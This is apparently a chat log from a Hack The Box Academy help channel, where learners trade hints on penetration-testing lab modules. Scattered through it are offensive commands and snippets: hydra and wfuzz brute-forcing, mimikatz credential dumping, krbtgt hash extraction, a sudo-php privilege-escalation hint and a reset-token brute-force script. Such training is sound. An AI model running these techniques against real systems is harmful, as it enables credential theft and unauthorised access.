oh I see. Chrome browser has a translate feature

maybe you can use it to translte the academy text

ok, if you find one let me know

https://support.google.com/chrome/answer/173424?hl=en&co=GENIE.Platform%3DDesktop

I only have 30 cubes, can I do something?

there are many 10 cube modules

on the left, there is a "paths" link

cracking into hack the box might be a good place to start

I believe once you complete a module, you get cubes back as well

Academy definitely the place to start, or there are the "Starting Point" categories on https://app.hackthebox.com

How can I put another lenguaje in the page?

I completed a module and I didn't win, I was with 40 I spent buying the module and I didn't receive it, unless I'm wrong

I could be wrong regarding earning cubes by completion to be honest, but that's what I recall. Will check..

I think you're right

anyone can assist on Attacking Common Applications - Skills Assessment I? i have questions 1,2,3. stuck on 4

Does look like in the code that upon completion of a module, you are rewarded with cubes. If you think something doesn't look right, please do reach out to our support team @kind saddle . They'll be back on Monday 🙂

have you tried fuzzing?

oops

I tried to put a spoiler thing

and it sent it to the bot as a report

sry ><

was not intentional

sorry!

Heh no problem

So long as you're not sharing direct solutions with others for active content, it's all good

oh was my previous comment ok?

will delete if not

It's quite direct..

A nudge in DM might be a better idea, but mentioning the intended vulnerability is quite the spoiler imho

Think how to direct, without pointing to the answer 🙂

ok 🙂

Cheers!

sorry for the late response but if you didn't finish that section then hint you can make your exploit base on the one show in the ||SOAPAction Spoofing|| section (for the intended way)

ok , thankss

Oh, I see. I used the automate.py to gain rce and access the db that way but I don't think that is intended. thanks for the tip!

I could see here why the cube didn't come, it doesn't complete a class, but thanks

or if you already got RCE you also can get the flag some where in the ||web root||

🙂

I'm having trouble in Getting Started // Nibbles - Initial Foothold. I have obtained the user.txt flag but the assessment answer box won't accept the answer. Has anyone else come across this issue?

Worked out the issue, it wants me to submit the flag of the target spawned in Academy, not the regular HTB labs box. I'll keep this in mind in the future.

<h1>Hello Hi</h1>

i have got the solution for this section of DNSAdmin using the dll provided on the tools folder.. is not a bug once you manage to get user added you need to log off and the log back in you can use cmd commnad: shutdown -l

i think is a normal things that you need to log off a this stage since user setting will need to be loaded again...

🤙🏻

Hey guys in the Linux module and I keep getting errors when trying to use the wget or now systemctl commands?

Requires authentication and I don't know the password for the HTB user

Anyone at zap scanner module?

htb[/htb]$ systemctl start ssh - this is the line that requires authentication - can someone help me

@vocal apex The desktop should contain a file called credentials

hi

I detected an entry in smb.conf (minimum protocol). Probably from other CTF. I deleted it and I update the system. Now it works.

Thanks @unreal patio

Use the "systemctl" command to list all units of services and submit the unit name with the description "Load AppArmor profiles managed internally by snapd" as the answer.

I've used
systemctl list-units --type=service | grep AppArmor

Which returned
apparmor.service
This is the only service with app armor but the answer is wrong?
Is there a better place to ask these questions - I don't want to clog up the adults table - with what I feel are very nooby questions

@vocal apex which section and question is this?

service and process management in linux basic

You are quite close to the answer

When you fill in the query you posted above you get two results

Try the second one instead of the first one

I just have load app armor profiles

I don't have a second one

Nope don't have the second line

mind if I message you what I have privately?

oh wow that work nice and good catch they should put this in the module

👍

yes lovely hahah thanks agreed they should update the module

It won't let me message you

Same for me, it says you have limited whom can message you

Hello can someone help me for IDOR ; Bypassing Encoded References

👍 thank you re drop first 17000, was giving up on that large list given time constraints, was also seeing unverified info that copy/pasting rule from module was it... I was also considering other users and short lists, etc. etc. ... so I had a huge matrix of potentials... dropping first 17000 likely got me past the section before 2050 LoL. Thanks again.

np

hy I am new in cyber security and I am in need of help and how to start. I have been able to download kali Linux but I am having some trouble downloading scripts from git hub so if anyone can please walk me through it. thank you.

if you are new to this i'm not sure if it is a good idea to run random code from github without knowing what you are running also check this video out to see which skill are you missing to start hacking https://www.youtube.com/watch?v=lhz0-qAQlBM

the Web Attacks module? sure what's the issue?

thanks.

also for github you can use git clone to clone the whole github repository or if you just want to download a single file you can click that file and look for the Download button if the file you are trying to download just have code and you can wget the url

Hi there, could someone give me a hint regarding the Broken Authentication Module -> Predictable Reset Token -> question number 2 (request a reset token for htbadmin to force a password change)? I can decode the temporary password and tamper it but not sure how can I use it to access the htbadmin.

hint use that as ||the password|| ||(after you change the token of course)||

Thanks @vital adder , going to try that!

Anyone having issues with xfreerdp disconnecting the session? It appears my session crashes frequently when doing the Windows modules for password attacks. I know it's not my fiber connection, it seems to disconnect me every 2 min or so

is your pwnbox on at the same time as your vpn?

but when I download a script and I try to install it I get an error on linux. saying cant find this file.

no I rarely use pwnbox, unless the vpn is giving me issues. I get a "network disconnect!" error

so the first thing you need to do is learn how linux work because if you don't know that i can't help you troubleshoot

academy have a free module on this but in the video i send you there is a section of "where to learn linux" or something like

yea try regenerate and new vpn and use that

yh am watching the video.

will do, thanks @vital adder

lately i also have the disconnect and slow network issue regenerate a new vpn help a bit but not much after a while

Password Attacks - PTH module - "Connect via RDP and use Mimikatz located in c:\tools to extract the hashes presented in the current session. What is the NTLM/RC4 hash of David's account?"

Are we suppose to use mimikatz to dump the current session hashes? When I use lsadump::lsa or lsadump::sam, the only users returned are admin, guest, default, and wdagutility. I've also used crackmapeec to remotely dump sam and lsa but still can't find David's hash. Any guidance to push me in the right direction?

Is there a way to increase the display size of a remote session in reminia, trying to read the output of my cmd window on this remote machine and its a couple hundred lines squished into a million lines

@shy warren use sekurlsa::logonPasswords full

hmm any idea why I'm getting this error "ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)"

You need to pass the debug command first

oops, just needed to privilege::debug. Thanks @placid quest

Is there a way to evil-winrm into a local admin account? I've tried both .\Administrator as well as the -r .\ option

Is the use of the MyWorkstation mandatory or does the VPN Connection also work in the academy?
Otherwise a free user just has one shot a day?

Figured out how to make reminina dynamically alter the resolution of the remote machine. It took me far to long to learn this.

You can use the pwnbox they provide or you can spin up a VM of your choice and openvpn into their network

VPN is free pwnbox is one per day I think for free users, id just spin up your own vpn so you can evaluate if you want to upgrade to a subscription and access the more complicated material

Thanks man 🙂

hello 🙂 one random question i tried looking in the internet but no luck and probably i wont be able to do that but

someone knows how to specify a name for the hydra.restore file ?? im trying to do a script and i need different restore files 🙂 thanks<3<3

in the ffuf model, where does it tell us which ip and port the webserver is supposed to run? nvm you need to start it in the exercise tab

does anyone know what ngrok is?

Can someone tell me why this one worked
|| wfuzz -c -z file,/home/sz/Documents/seclists/Usernames/top-usernames-shortlist.txt --hs "Invalid username" -u "http://134.122.106.163:30327/question1/?Username=FUZZ&Password=dummypass" ||

And this one didnt?
|| wfuzz -c -z file,/home/sz/Documents/seclists/Usernames/top-usernames-shortlist.txt -d "Username=FUZZ&Password=dummypass" --hs "Invalid username" -u "http://134.122.106.163:30327/question1/?" ||

I'm having issues in this section. Any hint?

Im trying to do it by SQLi but it seems imposible :S. Non even SQLmap

First is a GET request and second is POST. It must have needed a GET. You can also leave off that ? at the end of your post example because it isn’t doing anything

thanks for the explanation

yw

need help attacking common applications skills assessment 2. have all the answers but cant figure out the url to wordpress

oh this is dumb the answers need to have http://(domain) and without a / at the end

hint you can make you exploit base one the one show in the ||SOAPAction Spoofing|| but for ||logging in|| that's where the ||sql injection|| come into place

thanks, done. lol

When we use Rubeus we get a base64 key instead of the aes key is there a way to get the aes key? When I decode it I get garbage that can't be used to pth

I've already solved the page, just trying to dig deeper

Hey guys, maybe i´m stupid, but i´m stuck on "Active Infrastructure Identification" question 2. I don´t get how i can look for vhosts with whatweb.

I entered the passive command and still got the same result.

Footprinting Lab - Easy
Having issues using the dir and ls command

any suggestions?

Try to use ls -la command

You sexy bitch

Thank y’all for this ^

You were on footprinting easy as well?

i'm mounted to NFS share. I cat the file but it doesn't show anything. What do i need to do?

Yes I am casually working on it. Managed to ssh in after getting the creds off the ftp server. I uploaded linepeas.sh and gonna try to get privilege escalation based upon the CVE's it showed the box to be vulnerable to. .bash_history shows the flag.txt filed was made and moved to the root directory.

i can help if you dm

msaezh helped me but I think he just got off.

are you sure the file in question had anything in it to cat

oh brother. Are you saying i have to cat all files until something shows?

looks at the file sizes

ohhh la la

i had to ls -la to see that. thanks foxyboxy

Hey guys I'm new to ethical hacking and the stuff I'm reading in these modules aren't making any sense

which module and what doesnt make sense

you may need to brush up on your computer foundations first

esp Linux

@hazy grotto I currently stopped working on it but would you mind in the future if I dm you?

No problem. Whenever I'm on I will try to help.

I started footprinting before doing fundamentals.... Just finished fundamentals and came back to this...... This advice is soo good. almost makes too much sense.

I was mainly referring to Manny Sosa, but yeah wouldnt hurt

over half my flags from the hacktheboo ctf came down to just knowing basic linux tools

<@&861185840277487616>

I would start with the fundamentals modules and the intro to infosec path

What did i just miss?

just a normal scam

scam spammer nothing big

happens from time to time on any medium or larger server

Hey I need help with this Q: "se the user's credentials we found in the previous section and find out the credentials for MySQL. Submit the credentials as the answer. (Format: <username>:<password>)" I found the root creds n' I login into the mysql, I put the root creds as the answer and is incorrect, am I missing something?

Usually helps to put Module name and then the section. then the question

Ur right, sry is in Password Attacks - Password Reuse / Default Passwords

oh hint ||the cred is in one of the link||

can i dm you?

not atm, Im about to buckle down doing my own thing here

roger

I started linux Fundamentals and aside from learning the basics I'm completely lost. It's like the reading portion doesn't correlate with the questions bring asked.... Am I missing something ? Am I supposed to open up my kali linux terminal as I go along ?

I'm on Service and Process Management

yeah you should absolutely be following along with the module. Get those muscle memory going

why is it that \n = %0a , but when I encode the actual \n it is something else?

How are you encoding it?

with URL through burp

What is it encoding as with the unexpected result? I guess %5Cn?

its giving me %5c%6e

Yeah.. literal value of the string \n

Instead of the interpreted value of the escape \n, which is a newline, aka %0a

i see. I was so confused because all the other injection operators matched a URL encoding except that one --- thanks for the help

No worries 🙂

Hi guys 🤗.. anyone help me with this Q it on fuff mod what filter should I use because am getting alot of results

Try running a VHost fuzzing scan on 'academy.htb', and see what other VHosts you get. What other VHosts did you get?

I used this command

ffuf -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://academy.htb:PORT/ -H 'Host: FUZZ.academy.htb' -fs 900

are you writing the address correctly ? i see you have a /:PORT .... and also, for me, once it started running and i saw the filter size, i stopped and adjusted

Yes I have port 31577 it correct

Is this the correct command to connect RDP?

I'm trying to RDP into medium lab and having such a hard time. Not sure if it's installed correctly, wrong creds or wrong command

footprinting medium lab

with no "/" right haha sorry just making sure

no / lol really?

i have no idea what your working on bro... i was talking to XO7

srry

I see that now.

@sly tapir
What filter do you think I should to use

dm me a screenshot...i did this module like 2 weeks ago

Alright 👍

Hello everyone! I need help with Brute Forcing Skills Assesment-Web first question (When you try to access the IP shown above, you will not have authorization to access it. Brute force the authentication and retrieve the flag) I have like 3 days traying to find the password my understood here is the user must be b.gates and my commands is the next (hydra -l b.gates -P /usr/share/wordlists/rockyou.txt -f 134.122.106.163 -s 31793 http-post-form "/admin_login.php:username=^USER^&password=^PASS^:F=<form name='log-in'") is not clear how u should solve if someone could give me a hint I will appreciate a lot 😅

On Password Attacts PtT, I'm able to get the hash 256 hash for svc_workstations but I can't find the ntlm hash to crack and get the password. Can someone point me in the right direction? I tried forging a ticket but im not sure how to use that to privilege escalate on a linux machine.

I figured it out, was easy I was just looking down the wrong rabbit hole

You need to use sql manager studio program and think I followed steps in this article to show last 200 users. https://www.patrickkeisler.com/2019/05/management-studio-edit-top-200-rows/

Yes did that format and it worked.

Hello I need help on section Password Attacks - Password Reuse / Default Passwords, I found the root creds but idk what is the correct answer

oh wait i didn't realize they also updated that section but previous apply that also you ||can't find the cred on the target machine||

shoot me a dm if you still need help with that

Is anyone able to help with the CPTS Getting Started - Knowledge Check assessment?

I have gained the initial reverse shell and obtained the user.txt flag but I am having trouble escalating my privileges. I can see that I have sudo access to /usr/bin/php but can't work out how to use that to gain root privileges.

hint use ||gtfobins||

Hello hello and best regards

Thank you @vital adder, I got the flag!

hi guy, any tip on getting through no nut november?

MRtom this will be impossible for your squriily but

hi guys! can't seem to crack the aes256 hash in the Pass the Ticket Linux section of Passwords Attacks, any help

i don't think you can crack that hash and ||hint you can crack all crackable hash on crackstation||

Yea so far i got david, carlos, and john's passwords. I can impersonate svc_workstations but haven't got any luck cracking this pass. I may be lookin at the wrong thing tho

also are you on question 5?

yea

so i'm pretty sure i have a typo or something in my note for this one but you can ||basically do the same thing as the last question|| and if you did dump the hash try cracking i think ntlm hash or something like that not aes256 one

yea that was my first line of thought since it asks to use ssh to login as svc_ but using the keytabextract it doesn't find an RC4/NTLM hash

like i have this constant feeling that the answer is very very simple and i'm simply too dumb to see it

yea.... do an ls on that directory and try with other file that have ||similar name|| as that one

Today we have learned a very valuable lesson in life kids

Always ls -la the directory

and if you feel you're dumb

thats because you are

thx a bunch man

Would I receive any certificate after completing a module?

I don't think you do i may be wrong tho, but you can after you finish a path i.e "Penetration Tester"

and you can get a Student Transcript via Settings

Hi, I'm doing the password attacks, cracking linux passwd shadow and whatnot and I have a problem. I've successfully retrieved the passwd.bak and shadow.bak but when I run them through unshadow, the output file is identical to the shadow file

and therefore I can't crack it with haschcat

has anyone ever encountered this problem?

@pliant sage use john

i just tried

doesn't work

i ran this command: john --wordlist /usr/share/wordlists/rockyou.txt unshadowed.hashes

oh wait actually I think I made a mistake

I've officially completed every module on Academy. It's been fun

Shoutout to the module creators. Slightly expensive content but high-quality training for the most part

And for some reason my dashboard hasn't updated in a while. It should say 100% for everything

congrats

Hlo

o7 HTB I'm stumped for tonight @>@ and I must place this on hold until tomorrow...but i need some guidance on this question with in "Footprinting>Host Based Enum>DNS" with the " What is the FQDN of the host where the last octet ends with "x.x.x.203"? "

I have tried
https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/DNS/sortedcombined-knock-dnsrecon-fierce-reconng.txt
https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/DNS/subdomains-top1million-20000.txt
https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/DNS/subdomains-top1million-110000.txt

And have run these bash scripts & dnsenum against all 3 aswell as have referenced https://forum.hackthebox.com/t/hack-the-box-academy-footprinting-dns-enumeration/250408

Use the fierce wordlist

on .dev.

bet

Thankyou

Gl

@unreal patio this one :https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/DNS/fierce-hostlist.txt

?

Yup

dope thx

how to do this and what r u doing can yall teach me?

Can someone help me why is Session Security: Skills Assessment website not opening for me, what am I missing? :

I checked and the minilab is there on the list, any idea why is it not working for me?

Hi! Does anybody remember about it and is willing to help me with Footprinting module/medium lab?

@rustic sage Can you be a bit more specific with your question?

Yes. I am inside the MSSMS. I don't know on which database to use the "edit 200 entries on a specific database" hint provided, to find the HTB account that I'm asked for. I've seen some hints like <SELECT * FROM DB_NAME_FOUNDED WHERE USERNAME_COLUMNS like “%HTB%">, but I'm still dumb 🙂

@rustic sage Was getting lunch 😛

select * from accounts.dbo.devsacc where name = 'htb';

Try that query

@unreal patio Thank you! This way I learned how to use a query. This is my first experience with SQL. Problem solved!

🙂

Hi guys, I'm following the Network Enumeration module, host discovery - and I am getting a different terminal output from my Nmap scan then the example. My Nmap seems to not be doing ARP ping scans.

Here is the example:

And this is my output:

can u guys suggest some boxes after complete Information Gathering - Web Edition module in academy?cause academy did not suggest?for footprinting it did

hello,

doing this
https://academy.hackthebox.com/module/147/section/1391

been running hydra with the custom password list for nearly 2 hrs.....

how longs it supposed to take?

are you using the mutation wordlist?

yes

shouldn't take long

show us your command

hydra -l sam -P mut_password.list ssh://x.x.x.x

try -t 64 and -V, also recommend using your own vm and not pwnbox for this

no vm. hardware. ill try with what you said

Can need some help with Predictable Reset Token Question 1
This is the script im using

from hashlib import md5
import requests
from sys import exit
from time import time
import datetime

url = "http://138.68.181.31:31259/question1/"

header= {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8" , "Content-Type": "application/x-www-form-urlencoded"}
now = int(1667830437)
start_time = now
fail_text = "Wrong token"
user="htbadmin"
endtime=now+1000

for x in range(start_time-1000, endtime):
        raw_data = user+str(x)
        md5_token = md5(str(raw_data).encode()).hexdigest()
        data ="token={md5_token}&submit=check"

print("checking {} {}".format(str(x), md5_token))

res = requests.post(url, data=data,headers=header)

if not fail_text in res.text:
    print(res.text)
    print("[*] Congratulations! raw reply printed before")
    exit()


    exit()

data ="token={md5_token}&submit=check"
you're missing an f at the start of your f-string

also that data is never used and just rewritten until the loop ends

for x in range(start_time-1000, endtime):
        raw_data = user+str(x)
        md5_token = md5(str(raw_data).encode()).hexdigest()
        data =f"token={md5_token}&submit=check"

is it good now?

sure but you still never use data outside the loop

need someone who knows keyauth (i need cmd keyauth loader with hwid) DM ME good money to make

My coding skill is not that great. I tried with the indentation. it didnt worked

sorry I stoppepd the convo mid way I'm in a meeting

ok I fixed the code i think

but like you probably wanna send a request for each token you create

that's the main issue in your code

Ok After fixing the code it working

Also Anyone looking at this in future you have to use milliseconds

when I run secretsdump.py, it dumps all hashes including the krbtgt account but when i specify -just-dc-user krbtgt it cant find the account.. any ideas why this would be or how i can just pull down the krbtgt hash without printing the hundreds/thousands of other users?

anyone for web services/api module? having issues with sqli payload

still going..........................

how lol

no idea man..... bored of this part of the module now.
What am i doing wrong?

there was one question in that module that I had to delete the first 17000 passwords from the list in order to crack it in time.

this module gave me the most headache..

SAME!!

sounds like you had a fun time figuring that out.........

Can i ask the fast way of deleting 17000 passwords please?

sed -e 1,17000d mut_password.list > short.txt

I opened the list in mousepad

ewww

sed is much easier

thanks

brb!

currently doing web service and api attacks and i feel like i've wasted £9

what a re you stuck on? I have finished that one

hey guess what?
Its DONE.......... it took less than 20 seconds after deleting the first 17000 passwords.

nice haha

finished that question. it was super easy.......... why 17000 passwords... ahhhhh i been sitting here for hours!!!!!!!

thank you @fierce sparrow @lethal atlas

no worries

17000 was just a number to eliminate the majority. COuld have really been anything